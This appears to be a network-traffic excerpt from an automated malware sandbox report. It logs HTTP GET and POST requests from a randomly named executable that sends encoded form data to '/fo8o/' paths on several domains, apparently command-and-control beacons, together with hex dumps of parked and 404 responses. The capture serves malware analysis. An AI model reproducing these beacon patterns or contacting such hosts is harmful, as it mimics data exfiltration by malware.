                                                                                          Data Ascii: UT5tTdKX=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMoQ84+HaiplMLXyt/hmJnRFi9H/fWCV0fJvsRDLx6lH1p0zlX6NMlq38BEIWXFlAlX0L24fshsKxVlJfX9AA+MIUhZ9So9ITzDTaXkl14qKvkEl4KLHs5uRgds5UM4u8iYB1dbumzLgaA3T/XomeDmvKyhE3avR1fSEygXnYkGmlgNVQehO165cO72lihNFLxkYCjVkRxMylLpHi/zqeJHI1du01B6aFVEC+GK9WJU6gYJUPecCjzK9swDWayb8ZmHZeJ/4OSSDrXOqRDysWfN3irdbFhRxHasdGJ8fHmgRUQ7q75bPSfk5DUYG9UBoGdi8/mF/xbb5iSBE5JY12dA9aYXe5DGaUCD9a4C2fei4rNKdB9+BuOOEs4LKirthC28h2UyW7au3cW4PlACw9lABunaNscL+QtWzR0nRbjK8h1wMNNZK1kvO/iZcESC7N+cDrmgluCEHjfQXc0V2cvBN6bVduPb1dXYDe5/WGT/pCef4uOWdjBYB3f2EIBwROeAD75Mkn4n9Gbm9RO9xHMSnAUWNtBfPdhdkU+HNFMIly/4KFW2Y3PE1IR2k1a68+R8/BBBBOIwVSCGCeSfnbUZzQBeUWLBT22wRNNq+pkmWyRUDpFvf2jyfm3jS5K5KbFyo+Q/N6MUOpbO4V9IW5yGU9dOvkF68jtOUwQnVuE34QDrlXP9Q7Q8RIajk+fsL6l23HbWMc5Rs6ZOhHPv/oN0K9yBpnczxPQwb/nUR7UgEKZD1DjVw/Itpwyrh2mukh9gARKuIkh6Dw0GhJs5mUjJZ5ykBfSPKYkHSaDVs8H6iFEa0XmrFHU8AZOyE6oSxQ5c7MfQUmgtQ950qfdhIgaLeofjVX6RZdPen2hXitfVv/8m4jR37t0NuhY5JWHwSC2h6mRHsY/Wrxf1b0F8wpfgYsZD2q/QAl3ByJjp3n6dvdP3bj+k0a9v6QyqIR5IJSPY [TRUNCATED]
                                                                                          Dec 19, 2024 07:52:44.972100973 CET707INHTTP/1.1 405 Not Allowed
                                                                                          date: Thu, 19 Dec 2024 06:52:44 GMT
                                                                                          content-type: text/html
                                                                                          content-length: 556
                                                                                          server: Parking/1.0
                                                                                          connection: close
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          12192.168.2.54998891.195.240.94805956C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 19, 2024 07:52:46.354913950 CET524OUTGET /fo8o/?UT5tTdKX=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&sLRH=86fTArmPbL HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Host: www.rssnewscast.com
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Dec 19, 2024 07:52:47.659691095 CET1236INHTTP/1.1 200 OK
                                                                                          date: Thu, 19 Dec 2024 06:52:47 GMT
                                                                                          content-type: text/html; charset=UTF-8
                                                                                          transfer-encoding: chunked
                                                                                          vary: Accept-Encoding
                                                                                          expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                          cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                          pragma: no-cache
                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_q5hbCeY1ujfHw6H4vxzttAG+zR9plkTuySXStPpmqE7G5S64ZgoV6Vq4lnD1K1pW0c5t6OTfLcY5dpXouALz9w==
                                                                                          last-modified: Thu, 19 Dec 2024 06:52:47 GMT
                                                                                          x-cache-miss-from: parking-dc6db864f-df75c
                                                                                          server: Parking/1.0
                                                                                          connection: close
                                                                                          Data Raw: 38 35 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 71 35 68 62 43 65 59 31 75 6a 66 48 77 36 48 34 76 78 7a 74 74 41 47 2b 7a 52 39 70 6c 6b 54 75 79 53 58 53 74 50 70 6d 71 45 37 47 35 53 36 34 5a 67 6f 56 36 56 71 34 6c 6e 44 31 4b 31 70 57 30 63 35 74 36 4f 54 66 4c 63 59 35 64 70 58 6f 75 41 4c 7a 39 77 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e [TRUNCATED]
                                                                                          Data Ascii: 859<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_q5hbCeY1ujfHw6H4vxzttAG+zR9plkTuySXStPpmqE7G5S64ZgoV6Vq4lnD1K1pW0c5t6OTfLcY5dpXouALz9w==><head><meta charset="utf-8"><title>rssnewscast.com&nbsp;-&nbsp;rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informatio
                                                                                          Dec 19, 2024 07:52:47.659706116 CET224INData Raw: 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69
                                                                                          Data Ascii: n youre looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are searching for!"><link rel="icon" type="image/png" h
                                                                                          Dec 19, 2024 07:52:47.659785032 CET1236INData Raw: 72 65 66 3d 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 6c 6f 67 6f 73 2f 73 65 64 6f 5f 6c 6f 67 6f 2e 70 6e 67 22 0a 2f 3e 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61
                                                                                          Data Ascii: ref="//img.sedoparking.com/templates/logos/sedo_logo.png"/><style> .container-header__link{float:right;margin-right:100px;margin-bottom:15px;font-size:16px;color:#9a9494}.container-content{clear:both}/*! normalize.css v7.0.0 | MIT Lic
                                                                                          Dec 19, 2024 07:52:47.659822941 CET1236INData Raw: 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 6d 61 72
                                                                                          Data Ascii: ptgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button1D17,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkit-appearance:button}butt
                                                                                          Dec 19, 2024 07:52:47.659835100 CET1236INData Raw: 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 36 32 36 32 36 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a
                                                                                          Data Ascii: }[hidden]{display:none}.announcement{background:#262626;text-align:center;padding:0 5px}.announcement p{color:#717171}.announcement a{color:#717171}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#7171
                                                                                          Dec 19, 2024 07:52:47.659895897 CET1236INData Raw: 6c 61 74 65 73 2f 69 6d 61 67 65 73 2f 62 75 6c 6c 65 74 5f 6a 75 73 74 61 64 73 2e 67 69 66 22 29 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 32 70 78 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f
                                                                                          Data Ascii: lates/images/bullet_justads.gif");float:left;padding-top:32px}.two-tier-ads-list__list-element-content{display:inline-block}.two-tier-ads-list__list-element-header-link{font-size:37px;font-weight:bold;text-decoration:underline;color:#0a48ff}.t
                                                                                          Dec 19, 2024 07:52:47.659909010 CET1236INData Raw: 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 5f 5f 63 6f 6e
                                                                                          Data Ascii: xt-decoration:underline}.container-buybox{text-align:center}.container-buybox__content-buybox{display:inline-block;text-align:left}.container-buybox__content-heading{font-size:15px}.container-buybox__content-text{font-size:12px}.container-buyb
                                                                                          Dec 19, 2024 07:52:47.659919977 CET1236INData Raw: 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 61 63 74 2d 75 73 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 61 63 74 2d 75 73 5f 5f 63 6f
                                                                                          Data Ascii: display:inline-block}.container-contact-us__content-text,.container-contact-us__content-link{font-size:10px;color:#555}.container-privacyPolicy{text-align:center}.container-privacyPolicy__content{display:inline-block}.container-privacyPolicy__
                                                                                          Dec 19, 2024 07:52:47.659931898 CET1236INData Raw: 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 35 70 78 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 69 6e 69 74 69 61 6c 3b 6d 61 72 67 69 6e 3a 31 30 25 20 61 75 74 6f 3b
                                                                                          Data Ascii: ;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:inline-block;max-width:550px}.cookie-modal-window__content-text{line-height:1.5em}.cookie-modal-window__close{width:100%;mar
                                                                                          Dec 19, 2024 07:52:47.660079002 CET1236INData Raw: 79 2d 73 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 62
                                                                                          Data Ascii: y-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;borAECder-color:#727c83;color:#fff;font-size:initial}.switch input{opacity:0;width:0;height:0}.switch{positio
                                                                                          Dec 19, 2024 07:52:47.779443979 CET1236INData Raw: 22 73 69 6e 67 6c 65 44 6f 6d 61 69 6e 4e 61 6d 65 22 3a 22 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 22 2c 22 64 6f 6d 61 69 6e 4e 61 6d 65 22 3a 22 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 22 2c 22 64 6f 6d 61 69 6e 50 72 69 63 65 22 3a
                                                                                          Data Ascii: "singleDomainName":"rssnewscast.com","domainName":"rssnewscast.com","domainPrice":0,"domainCurrency":"","adultFlag":false,"pu":"//www.rssnewscast.com","dnsh":true,"dpsh":false,"toSell":false,"cdnHost":"img.sedoparking.com","adblockkey":" data-


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          13192.168.2.54998966.29.149.46805956C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 19, 2024 07:53:01.863102913 CET786OUTPOST /fo8o/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.techchains.info
                                                                                          Origin: http://www.techchains.info
                                                                                          Cache-Control: no-cache
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Content-Length: 209
                                                                                          Referer: http://www.techchains.info/fo8o/
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Data Raw: 55 54 35 74 54 64 4b 58 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 49 64 72 2b 59 53 49 49 64 68 49 53 61 68 49 73 7a 47 4e 63 69 31 4e 6f 76 79 34 6b 6d 62 53 73 59 6e 36 30 39 74 77 3d
                                                                                          Data Ascii: UT5tTdKX=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXIdr+YSIIdhISahIszGNci1Novy4kmbSsYn609tw=
                                                                                          Dec 19, 2024 07:53:03.071779966 CET637INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 19 Dec 2024 06:53:02 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 493
                                                                                          Connection: close
                                                                                          Content-Type: text/html
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          14192.168.2.54999066.29.149.46805956C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 19, 2024 07:53:04.508168936 CET806OUTPOST /fo8o/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.techchains.info
                                                                                          Origin: http://www.techchains.info
                                                                                          Cache-Control: no-cache
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Content-Length: 229
                                                                                          Referer: http://www.techchains.info/fo8o/
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Data Raw: 55 54 35 74 54 64 4b 58 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 68 51 2f 68 77 54 33 72 7a 46 43 45 71 45 6a 36 6c 52 4e 63 71 31 55 39 69 56 32 62 32 58 2f 52 73 2b 46 6d 46 4e
                                                                                          Data Ascii: UT5tTdKX=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVhQ/hwT3rzFCEqEj6lRNcq1U9iV2b2X/Rs+FmFN
                                                                                          Dec 19, 2024 07:53:05.739797115 CET637INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 19 Dec 2024 06:53:05 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 493
                                                                                          Connection: close
                                                                                          Content-Type: text/html
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          15192.168.2.54999166.29.149.46805956C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 19, 2024 07:53:07.366470098 CET1823OUTPOST /fo8o/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.techchains.info
                                                                                          Origin: http://www.techchains.info
                                                                                          Cache-Control: no-cache
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Content-Length: 1245
                                                                                          Referer: http://www.techchains.info/fo8o/
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Data Raw: 55 54 35 74 54 64 4b 58 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 63 57 44 32 67 46 78 31 5a 31 7a 56 4d 79 39 68 4d 2f 32 39 50 59 42 6b 57 65 67 36 34 30 57 38 32 68 53 35 62 52 2b 37 33 2f 70 31 59 78 46 53 30 52 52 4a 71 57 32 41 7a 76 70 6a 47 62 49 38 31 4c 70 36 56 6b 71 62 39 50 7a 33 70 72 75 61 75 50 52 51 6d 44 34 44 49 71 68 2b 41 4e 67 61 38 6b 31 58 38 6b 79 50 74 4d 6d 67 59 70 30 4f 63 45 34 33 4a 57 57 37 4e 71 4c 65 49 6f 76 41 4a 52 66 63 6e 2f 44 2b 4a 63 52 51 61 42 5a 72 68 6b 73 75 44 75 5a 71 6c 45 73 48 4a 2f 58 [TRUNCATED]
